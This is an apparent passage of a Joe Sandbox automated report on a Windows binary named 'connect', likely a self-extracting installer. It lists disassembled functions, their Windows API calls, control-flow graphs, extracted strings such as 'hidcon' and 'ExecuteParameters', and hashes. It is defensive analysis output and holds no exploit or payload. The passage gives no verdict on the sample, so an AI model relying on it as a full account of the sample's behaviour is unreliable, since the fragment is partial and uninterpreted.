                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: Find$CloseErrorFileFirstLast
                                                            • String ID:
                                                            • API String ID: 4020440971-0
                                                            • Opcode ID: 51e7d17a183acfe0b45fd0fe4c80841a4b910e0bbb6a3a3fe48daa13f71b5f8e
                                                            • Instruction ID: e3b0549d9665dc12e139117a84a4800e541ff601511f6dde0f87e89220829db4
                                                            • Opcode Fuzzy Hash: 51e7d17a183acfe0b45fd0fe4c80841a4b910e0bbb6a3a3fe48daa13f71b5f8e
                                                            • Instruction Fuzzy Hash: 33F0F630700108ABCF21AF30EC4DB5B3BACAB8035EF1046B1F925E11E0E774D946AA58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00403DA4 Relevance: 6.0, APIs: 4, Instructions: 36fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 977 403da4-403db4 978 403e04-403e08 977->978 979 403db6-403dc9 FindFirstFileW 977->979 979->978 980 403dcb-403dd9 FindClose 979->980 981 403df9-403dfc call 403c8f 980->981 982 403ddb-403de8 SetFileAttributesW 980->982 986 403e01-403e03 981->986 983 403df5-403df8 982->983 984 403dea-403df4 DeleteFileW 982->984
                                                            APIs
                                                            • FindFirstFileW.KERNELBASE(0040638E,?), ref: 00403DC0
                                                            • FindClose.KERNEL32(00000000), ref: 00403DCC
                                                            • SetFileAttributesW.KERNEL32(0040638E,00000000), ref: 00403DE0
                                                            • DeleteFileW.KERNEL32(0040638E), ref: 00403DED
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: File$Find$AttributesCloseDeleteFirst
                                                            • String ID:
                                                            • API String ID: 3319113142-0
                                                            • Opcode ID: 7a61a38b35f2b05a7b4bde6f25ad9c61d42a494951ae97ad8595f31ef7f661e8
                                                            • Instruction ID: 10cdb507c6f18802a829504191793466465721f7b53cb2a47095233dfdd97b6e
                                                            • Opcode Fuzzy Hash: 7a61a38b35f2b05a7b4bde6f25ad9c61d42a494951ae97ad8595f31ef7f661e8
                                                            • Instruction Fuzzy Hash: 4CF05431600148ABDF219F30ED4D75A3FA9AB4035BF444675F41AE00F0DB78CE86AA88
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040ACC7 Relevance: 6.0, APIs: 2, Strings: 1, Instructions: 702COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 996 40acc7-40ad1e call 40d53c 999 40ad20-40ad25 996->999 1000 40ad2a-40ad5f call 40a48f call 40abd6 call 40f3c8 996->1000 1001 40b44d-40b45b call 40a70f 999->1001 1010 40b202-40b207 1000->1010 1011 40ad65-40ad7a 1000->1011 1012 40b439-40b448 call 419939 call 40a652 1010->1012 1013 40adc7-40adc9 1011->1013 1014 40ad7c-40ad99 1011->1014 1012->1001 1016 40ade5-40adec 1013->1016 1017 40adcb-40addf call 40aa3b 1013->1017 1018 40adab 1014->1018 1019 40ad9b 1014->1019 1023 40adfa 1016->1023 1024 40adee-40adf8 1016->1024 1017->1016 1033 40aeea-40af0b 1017->1033 1020 40adad 1018->1020 1025 40ada1-40ada6 1019->1025 1026 40ad9d-40ad9f 1019->1026 1027 40adc0-40adc4 1020->1027 1028 40adaf-40adb2 1020->1028 1031 40adfc-40ae09 call 4198f2 1023->1031 1024->1031 1025->1012 1026->1020 1026->1025 1027->1013 1028->1027 1032 40adb4-40adbe 1028->1032 1037 40ae15-40ae3e call 4012c5 1031->1037 1038 40ae0b-40ae13 call 40a577 1031->1038 1032->1013 1041 40af11-40af1b 1033->1041 1042 40b18a-40b18e 1033->1042 1037->1012 1057 40ae44-40ae4a 1037->1057 1038->1037 1045 40af1e-40af31 1041->1045 1047 40b190-40b196 1042->1047 1048 40b19b-40b1ba call 4198f2 1042->1048 1055 40af33 1045->1055 1056 40af36-40af4c 1045->1056 1047->1048 1053 40b20c-40b210 1048->1053 1054 40b1bc-40b1ca call 40a520 1048->1054 1058 40b213-40b215 1053->1058 1054->1058 1055->1056 1070 40af87-40af9d 1056->1070 1071 40af4e-40af5f call 4143dc 1056->1071 1060 40aec9-40aee7 call 40a8a5 call 40a83e 1057->1060 1061 40ae4c 1057->1061 1062 40b217-40b219 1058->1062 1063 40b21d-40b223 1058->1063 1060->1033 1066 40ae4e-40ae72 call 40ffc3 1061->1066 1062->1063 1068 40b261 1063->1068 1069 40b225-40b24a 1063->1069 1083 40ae74-40ae7e 1066->1083 1084 40ae8a-40ae92 call 40a6f1 1066->1084 1074 40b264-40b26d 1068->1074 1089 40b250-40b25f call 4012c5 1069->1089 1090 40b427-40b429 1069->1090 1087 40afa3-40afae 1070->1087 1088 40b057-40b06d 1070->1088 1082 40af62-40af77 1071->1082 1080 40b273-40b295 1074->1080 1081 40b37c 1074->1081 1091 40b297-40b29e call 4105ec 1080->1091 1092 40b2b8-40b2c6 call 4198f2 1080->1092 1085 40b37f-40b38d call 40a433 1081->1085 1093 40af7d-40af7f 1082->1093 1094 40b1df-40b1e1 1082->1094 1095 40ae80-40ae83 1083->1095 1096 40ae97-40ae9b 1083->1096 1084->1012 1117 40b3a2-40b3a6 1085->1117 1118 40b38f-40b391 1085->1118 1103 40afb4-40afc5 1087->1103 1104 40b1da 1087->1104 1124 40b08f-40b0b5 call 40a461 call 40a433 1088->1124 1125 40b06f-40b07f 1088->1125 1089->1074 1108 40b431-40b434 call 40a5b8 1090->1108 1109 40b42b-40b42d 1090->1109 1110 40b2a1-40b2a5 1091->1110 1121 40b2d6 1092->1121 1122 40b2c8-40b2d4 1092->1122 1093->1070 1097 40af81-40af83 1093->1097 1094->1012 1106 40b1e7-40b1ed 1094->1106 1098 40aea2-40aec3 call 40a6f1 1095->1098 1099 40ae85 1095->1099 1096->1099 1102 40ae9d-40aea0 1096->1102 1097->1070 1098->1060 1148 40aec5-40aec7 1098->1148 1099->1084 1102->1098 1102->1099 1132 40afcb-40afe3 1103->1132 1133 40b1cc-40b1d8 SysFreeString 1103->1133 1104->1094 1106->1012 1108->1012 1109->1108 1110->1090 1116 40b2ab-40b2b6 call 4012c5 1110->1116 1145 40b2ef-40b2fb call 4198f2 1116->1145 1129 40b418 1117->1129 1130 40b3a8-40b3b2 1117->1130 1128 40b393-40b3a0 1118->1128 1134 40b2d8-40b2ea call 4012c5 call 40b4ac 1121->1134 1122->1134 1163 40b135-40b13d 1124->1163 1164 40b0b7-40b0bd 1124->1164 1125->1094 1153 40b085-40b087 1125->1153 1128->1117 1128->1128 1142 40b41d-40b426 call 419939 1129->1142 1137 40b3b4-40b3c4 call 40faf1 1130->1137 1138 40b3eb-40b404 call 40f6a4 1130->1138 1140 40aff3-40b009 call 419930 1132->1140 1141 40afe5-40aff0 call 4115d4 1132->1141 1133->1094 1134->1145 1137->1138 1165 40b3c6-40b3d0 call 4198f2 1137->1165 1156 40b407-40b40e 1138->1156 1167 40b021-40b03b call 419939 1140->1167 1168 40b00b-40b01f 1140->1168 1141->1140 1142->1090 1170 40b30b 1145->1170 1171 40b2fd-40b309 1145->1171 1148->1066 1153->1124 1154 40b089-40b08b 1153->1154 1154->1124 1156->1142 1169 40b410-40b416 1156->1169 1172 40b14b-40b151 1163->1172 1173 40b13f-40b145 1163->1173 1174 40b0c0-40b0cd call 40b45e 1164->1174 1186 40b3d2-40b3da call 40a4d7 1165->1186 1187 40b3dc-40b3e8 call 4012c5 1165->1187 1167->1133 1198 40b041-40b04f SysFreeString 1167->1198 1168->1167 1168->1168 1169->1142 1178 40b30d-40b354 call 40aa04 call 4012c5 * 2 1170->1178 1171->1178 1181 40b154-40b184 call 419939 * 2 1172->1181 1173->1172 1179 40b147-40b149 1173->1179 1188 40b0ea-40b0fa call 40b485 1174->1188 1189 40b0cf-40b0e8 1174->1189 1213 40b361-40b36a 1178->1213 1214 40b356-40b35f 1178->1214 1179->1181 1181->1042 1181->1045 1186->1187 1187->1138 1208 40b100-40b11f 1188->1208 1209 40b1f2-40b201 call 419939 * 2 1188->1209 1200 40b122-40b133 1189->1200 1198->1088 1204 40b051-40b053 1198->1204 1200->1163 1200->1174 1204->1088 1208->1200 1209->1010 1217 40b374-40b37a 1213->1217 1218 40b36c-40b36f 1213->1218 1214->1213 1217->1085 1218->1080
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID: 0-3916222277
                                                            • Opcode ID: 0256bec53725de02d832ee6f6f51abc186299f533e587bcbcf9165cb040afc50
                                                            • Instruction ID: d998a19c913f7f912822581fb92aac2ec25c6f99d8a18e6f21e12a811f9c8fff
                                                            • Opcode Fuzzy Hash: 0256bec53725de02d832ee6f6f51abc186299f533e587bcbcf9165cb040afc50
                                                            • Instruction Fuzzy Hash: DC525E75A00219DFCB14DFA9C8949AEBBB5FF48304B14806EE805AB391DB34ED51CF99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041BDB6 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000002,?,0041BDB5,00000003,0041BA09,00000002,00000003,00000002,00000000), ref: 0041BDD8
                                                            • TerminateProcess.KERNEL32(00000000,?,0041BDB5,00000003,0041BA09,00000002,00000003,00000002,00000000), ref: 0041BDDF
                                                            • ExitProcess.KERNEL32 ref: 0041BDF1
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentExitTerminate
                                                            • String ID:
                                                            • API String ID: 1703294689-0
                                                            • Opcode ID: 207957e0c329094dae35d0a8ebc47e1ce946d3f4a5be13e039f89d831d0761e4
                                                            • Instruction ID: 227a02c008be70c07f796fd34de9e73ae149e9ffe75d4c930773d3de324b7c04
                                                            • Opcode Fuzzy Hash: 207957e0c329094dae35d0a8ebc47e1ce946d3f4a5be13e039f89d831d0761e4
                                                            • Instruction Fuzzy Hash: 39E08C31200208EFCF212F15ED0DADA3F28EB00395B810429F80586232DB39EDD3CB88
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004032B5 Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDiskFreeSpaceExW.KERNELBASE(?,00000000,00000000), ref: 004032D1
                                                            • SendMessageW.USER32(00008001,00000000,?), ref: 0040332A
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: DiskFreeMessageSendSpace
                                                            • String ID:
                                                            • API String ID: 696007252-0
                                                            • Opcode ID: 9a16ed911049c2afffbb9f7af777bd1b61c45472753dc605de79b2ff63c77514
                                                            • Instruction ID: 2285e2836e3a2db4b6a004885bee9ccc40bf589f8c8ad71c9305bc2d0ff7f81e
                                                            • Opcode Fuzzy Hash: 9a16ed911049c2afffbb9f7af777bd1b61c45472753dc605de79b2ff63c77514
                                                            • Instruction Fuzzy Hash: A2016D70250204EBEB14DF51ECA6F5A3BADAB01715F10453AF900EA1E1DBB9EE408B6C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00401FA8 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 269COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 595 401fa8-401fda call 4114a2 call 403336 call 405f4e 602 401fdb-401fee call 4033f9 595->602 605 401ff0-401ff5 602->605 606 401ff7-40200a call 4033f9 602->606 605->602 609 402012-402025 call 4033f9 606->609 610 40200c-402010 606->610 613 402034-402047 call 4033f9 609->613 614 402027-402030 609->614 610->602 619 402053-402068 call 4033f9 613->619 620 402049 613->620 614->602 615 402032 614->615 617 40204b-402051 615->617 617->602 623 402087-402099 call 4033f9 619->623 624 40206a-402071 619->624 620->617 627 4020af-4020b1 623->627 630 40209b-4020ad call 4033f9 623->630 626 402073-402085 call 41b120 624->626 624->627 626->627 627->602 630->627 634 4020b6-4020bf call 4048fa 630->634 637 4020c1-4020c6 634->637 638 4020cb-4020d4 call 4048b5 634->638 637->602 641 4020e4-4020eb 638->641 642 4020d6-4020df 638->642 643 4020ed-4020f1 641->643 644 40213f-402142 call 41156d 641->644 642->602 645 4020f3-402113 call 4115d4 call 411772 * 2 643->645 646 402115-402116 call 4115d4 643->646 649 402147-40214b call 411772 644->649 653 40211b-40212e call 40476f 645->653 646->653 655 402150-402180 call 4114a2 call 404cf6 call 41146b call 405f4e 649->655 653->655 662 402130-40213d call 411772 653->662 672 402186-402192 call 4026d2 655->672 673 40228c-4022b5 call 419939 * 2 call 403385 call 419939 655->673 662->649 672->673 678 402198-4021a0 672->678 681 4021a2-4021a6 call 411772 678->681 682 4021ab-4021b9 call 405f4e 678->682 681->682 689 40223f-402250 call 40230a 682->689 690 4021bf-402220 call 4116a4 call 41167f call 41165f call 41146b call 419939 * 3 call 4025a9 682->690 696 402252-402257 call 4026a4 689->696 697 402259-40225a SetLastError 689->697 721 402225-40222d 690->721 696->673 700 402260-402267 697->700 703 402276-402281 call 409afd 700->703 704 402269-402274 GetLastError 700->704 706 402284-40228b call 40637a 703->706 704->703 704->706 706->673 722 402237-40223d call 419939 721->722 723 40222f-402235 call 419939 721->723 722->700 723->696
                                                            APIs
                                                              • Part of subcall function 00403336: GetCurrentDirectoryW.KERNEL32(00000000,00000000,00000000,?,00000000,00401FC8,?,?,?,?), ref: 0040334F
                                                              • Part of subcall function 00403336: GetCurrentDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 00403365
                                                            • GetLastError.KERNEL32(?,?,?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00402269
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory$ErrorLast
                                                            • String ID: ExecuteParameters$del$forcenowait$hidcon$nowait$shc$waitall
                                                            • API String ID: 1128942804-4019298132
                                                            • Opcode ID: 2d5214349d591634bf6aa91414b3519f6bf119ef96bd9c13cb05d7e45e88e4b7
                                                            • Instruction ID: 79abc5d09dd1fe575cbc2c693773810bb592a40cff80e8f1c38a75b2b6ac7b4d
                                                            • Opcode Fuzzy Hash: 2d5214349d591634bf6aa91414b3519f6bf119ef96bd9c13cb05d7e45e88e4b7
                                                            • Instruction Fuzzy Hash: 8281B471900215AADB10BBB1DD56BEF37689F01318F14403FF901B21E2EBBD9A45D66D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00406390 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 78libraryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 753 406390-40641d LoadLibraryA #17 call 40a398 call 40478c call 4041e0 * 7 772 406423-406435 SHGetSpecialFolderPathW 753->772 773 406484-406488 772->773 774 406437-406454 wsprintfW call 40575f 772->774 773->772 776 40648a-40648e 773->776 777 406459-40645c 774->777 778 40645e-406464 777->778 779 406466-406479 call 40575f 778->779 780 40647c-406482 778->780 779->780 780->773 780->778
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32), ref: 004063A1
                                                            • #17.COMCTL32 ref: 004063AC
                                                              • Part of subcall function 0040478C: GetUserDefaultUILanguage.KERNEL32(004042F4), ref: 00404798
                                                              • Part of subcall function 004041E0: GetLastError.KERNEL32 ref: 00404227
                                                              • Part of subcall function 004041E0: wsprintfW.USER32 ref: 00404238
                                                              • Part of subcall function 004041E0: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00404247
                                                              • Part of subcall function 004041E0: GetLastError.KERNEL32 ref: 00404252
                                                              • Part of subcall function 004041E0: GetEnvironmentVariableW.KERNEL32(?,00000000,0000002D), ref: 0040427C
                                                              • Part of subcall function 004041E0: GetLastError.KERNEL32 ref: 00404287
                                                              • Part of subcall function 004041E0: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00404299
                                                              • Part of subcall function 004041E0: SetLastError.KERNEL32(00401877), ref: 004042CD
                                                              • Part of subcall function 004041E0: lstrlenA.KERNEL32(00426DB8), ref: 00404303
                                                              • Part of subcall function 004041E0: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00404352
                                                              • Part of subcall function 004041E0: MultiByteToWideChar.KERNEL32(000004E4,00000000,00426DB8,00000001,00000000,00000002), ref: 00404388
                                                            • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000), ref: 0040642D
                                                            • wsprintfW.USER32 ref: 00406441
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$EnvironmentVariablewsprintf$ByteCharDefaultFolderInfoLanguageLibraryLoadLocaleMultiPathSpecialUserWidelstrcmpilstrlen
                                                            • String ID: SfxFolder%02d$X]n$kernel32
                                                            • API String ID: 4084782872-2302643976
                                                            • Opcode ID: 2239f6a811073cff4787cda300e99307c01aa96f1ef7eba5900fab77654688db
                                                            • Instruction ID: 0f1f37d1872d4710edaacd892d75d118e21a553dc86ed096006d16a5be08c7a8
                                                            • Opcode Fuzzy Hash: 2239f6a811073cff4787cda300e99307c01aa96f1ef7eba5900fab77654688db
                                                            • Instruction Fuzzy Hash: B521B5F6A00314ABD710AFB2AC4BB4A7A6CEB54704F01163FF505AB191DAB94650CB5C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040763A Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 25libraryloaderCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 783 40763a-407661 GetModuleHandleW GetProcAddress FreeConsole GetTickCount 784 407663-407668 783->784 785 40767f-407683 783->785 784->785 786 40766a-407676 call 4066cf 784->786 788 40767b-40767e 786->788
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00407642
                                                            • GetProcAddress.KERNEL32(00000000,FreeConsole), ref: 0040764E
                                                            • FreeConsole.KERNELBASE ref: 00407654
                                                            • GetTickCount.KERNEL32 ref: 00407656
                                                              • Part of subcall function 004066CF: GetTickCount.KERNEL32 ref: 004066E6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: CountTick$AddressConsoleFreeHandleModuleProc
                                                            • String ID: FreeConsole$kernel32.dll
                                                            • API String ID: 4175398751-2564406000
                                                            • Opcode ID: 710c50f79aba4c523b4f987b7f45da6f2e16107925628630bea301c033f2ea13
                                                            • Instruction ID: 9aab5fbedfb6153a2c1d2f29fcbd1ee656fb7f9a0bacd6b74a88640cf79d6496
                                                            • Opcode Fuzzy Hash: 710c50f79aba4c523b4f987b7f45da6f2e16107925628630bea301c033f2ea13
                                                            • Instruction Fuzzy Hash: C0E04F32658148ABCF21AFF4EC09D5E3B69EB403647440872F50ED00B0C63EDA62AB5D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00402D53 Relevance: 7.8, APIs: 5, Instructions: 283COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 789 402d53-402d60 790 402d62-402d67 789->790 791 402d6c-402d77 789->791 792 403054-403055 790->792 793 402d80-402d8f 791->793 794 402d79-402d7b 791->794 796 402d91-402d97 793->796 797 402d99-402dba 793->797 795 403053 794->795 795->792 796->797 800 402dc0-402dcc call 4114a2 797->800 801 403047-403052 call 411ef2 797->801 806 402dd2-402dd7 800->806 807 403034-40303c 800->807 801->795 806->807 808 402ddd-402e2d call 4115d4 call 41165f call 4115d4 call 419939 806->808 811 40303e-403046 call 419939 807->811 822 402e33-402e37 808->822 823 40302a-403032 call 411ef2 808->823 811->801 824 402e39-402e3c 822->824 825 402e3e-402e43 822->825 823->811 827 402e58-402e6e 824->827 828 402e52-402e55 825->828 829 402e45 825->829 827->823 834 402e74-402e94 827->834 828->827 831 402e47-402e4d 829->831 835 403028 831->835 834->823 837 402e9a-402ea0 834->837 835->823 838 402ea2-402ea5 837->838 839 402ebb-402ecd GetLocalTime SystemTimeToFileTime 837->839 840 402ea7-402ea9 838->840 841 402eab-402eb9 838->841 842 402ed3-402ed7 839->842 840->831 841->842 843 402ef1-402eff call 404399 842->843 844 402ed9-402ee4 call 403769 842->844 851 402f05-402f08 843->851 852 403019-403024 GetLastError 843->852 849 403015-403017 844->849 850 402eea-402eec 844->850 849->823 850->831 851->849 853 402f0e-402f1a call 4198f2 851->853 852->835 856 402f2c 853->856 857 402f1c-402f2a 853->857 858 402f2e-402f37 856->858 857->858 859 402f42-402f53 call 410130 858->859 860 402f39-402f3f 858->860 863 402f58-402f5a 859->863 860->859 864 402f60-402f83 GetLastError call 41143a call 4040ff 863->864 865 402ff7-403007 call 4012c5 863->865 874 402f92-402fa9 call 403769 864->874 875 402f85-402f90 864->875 870 403009-40300b 865->870 870->823 872 40300d-403013 870->872 872->823 881 402fb5-402fd0 call 410130 874->881 882 402fab-402fb3 874->882 880 402fe1-402fec call 419939 875->880 880->870 888 402fd2-402fdd GetLastError 881->888 889 402fee-402ff6 call 419939 881->889 882->880 888->880 889->865
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a8b2acb0b9a4ac2e010bea7435fc9a42d9107897cf5c84b06bfe01fa68f5036b
                                                            • Instruction ID: 04da94e71567e9aefed9a9e97c2b5dbe456225fad92d1bae566689f0b3f5e2fe
                                                            • Opcode Fuzzy Hash: a8b2acb0b9a4ac2e010bea7435fc9a42d9107897cf5c84b06bfe01fa68f5036b
                                                            • Instruction Fuzzy Hash: A6A1AFB2900205EFCF14DF64D888AAA7BB9BF48315F11416AF901EB2D1DB78D982CB54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041C267 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 892 41c267-41c26e 893 41c270-41c272 892->893 894 41c273-41c27a call 41f4db call 41f859 892->894 898 41c27f-41c283 894->898 899 41c285-41c288 898->899 900 41c28a-41c293 call 41c2ba 898->900 901 41c2ae-41c2b9 call 41d8ba 899->901 905 41c295-41c298 900->905 906 41c29a-41c2a1 900->906 908 41c2a6-41c2ad call 41d8ba 905->908 906->908 908->901
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: _free
                                                            • String ID: (3k$(3k
                                                            • API String ID: 269201875-976709899
                                                            • Opcode ID: 8ffefae7a48324e20509260429bcb6285bdb87c0c19b30ac424f9fa377c60f5f
                                                            • Instruction ID: 5808d26be7ee1ab77fe3c94bb71eb52f8c8bbb4deffaa66e8b4fef4713e96f15
                                                            • Opcode Fuzzy Hash: 8ffefae7a48324e20509260429bcb6285bdb87c0c19b30ac424f9fa377c60f5f
                                                            • Instruction Fuzzy Hash: D9E0E5B2E8151187A22177BB7C423EB1182AB81336F11037BF828866D0DF7C88C2415E
                                                            Uniqueness

